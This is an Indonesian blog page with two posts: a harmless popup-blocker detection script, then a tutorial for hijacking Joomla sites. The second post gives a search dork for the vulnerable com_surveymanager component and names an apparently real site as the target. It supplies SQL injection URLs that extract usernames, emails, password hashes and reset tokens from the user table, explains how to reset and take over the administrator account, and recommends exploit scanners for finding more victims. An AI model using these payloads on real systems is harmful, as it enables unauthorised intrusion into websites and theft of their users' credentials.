Javascript Pendeteksi POP Blocker

Kali ini share tentang snippet yang mendeteksi POP Blocker, dan akan ada sedikit peringatan pada client. Silahkan salin script berikut

<!-- paste script berikut dengan nama: detectPopupBlocker.js  -->

function detectPopupBlocker() {

  var myTest = window.open("about:blank","","directories=no,height=100,width=100,menubar=no,resizable=no,scrollbars=no,status=no,titlebar=no,top=0,location=no");

  if (!myTest) {

    alert("Kami mendeteksi popup blocker.");

  } else {

    myTest.close();

    alert("Kami tidak mendeteksi popup blocker.");

  }

}

window.onload = detectPopupBlocker;

Semoga berguna. J

Sumber : Indonesian Hacker Team

Read more »

Reset Joomla dari Nol

Hai sobat Blogger semua? Lama tidak posting lagi, semenjak kesibukan mempersiapkan UN, lalu disusul UAS, dan kemudian hal paling mendebarkan, yaitu SNMPTN. Penulis jadi tidak sempat meng-update.  Tidak hanya sampai situ, dilanjut tes-tes lainnya sebagai cadangan kalau-kalau tidak tembus SNMPTN. Dengan berat hati, ternyata ‘tidak lulus’ SNMPTN saudara-saudara.  Bingung. Belum ada satupun cadangan waktu itu. Sebenarnya sih ada, tapi sudah expired, yaitu diterima di Universitas Gunadarma, Universitas Bakrie, dan Universitas Komputer Indonesia. Semuanya di jurusan Informatika. Tapi apalah daya, nunggu SNMPTN sampe pada expired semua. Kenapa ga DP dulu? Dikira cicilan laptop? Hmm.. alasannya simpel, biaya. Oh, kenapa masalah klasik masih ada di Indonesia? Seandainya ga pada korupsi, pasti makmur. Tapi yaa, seandainya tetap seandainya. Lalu dimana saya sekarang?? Tenang, saya tetap masih bisa kuliah. Di IT Telkom Bandung. Tepatnya di jurusan Ilmu Komputasi. Kok jadi curhat ya? ^_^v  Ok deh lanjut tutorialnya. Credit ke milw0rm.com

OK, pertama sediain dulu dork-nya : option=com_surveymanager

Terus cari targetnya. Anggap udah dapet http://www.yourwedding.com.au

Exploit-nya : -2+union+select+1,concat_ws(0x3a,username,password) ,3,4,5,6+from+jos_users—

Hmm.. disini pake teknik reset Joomla

Caranya : 

untuk masuk halaman reset >>> index.php?option=com_user&view=reset

                Jadinya http://www.yourwedding.com.au/index.php?option=com_user&view=reset

untuk mendapatkan email setelah concat (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)

                Jadinya http://www.yourwedding.com.au/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,3,4,5,6+from+jos_users--

untuk masuk halaman token >>> index.php?option=com_user&view=reset&layout=confirm

                Jadinya http://www.yourwedding.com.au/index.php?option=com_user&view=reset&layout=confirm

untuk mendapatkan token setelah concat (0x3a,username,0x3a,email,0x3a,0x3a,activation)

                Jadinya http://www.yourwedding.com.au/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,3,4,5,6+from+jos_users--

Udah di reset Joomla tinggal >>> http://www.yourwedding.com.au/administrator/

Masukin dah tuh user n password-nya yang tadi sudah di reset.

Oiya, untuk tambahan, cari target yang vurn pake exploit scanner ajah biar cepet.. :D kayak pepatah “Biar cepat yang penting selamat”.

Read more »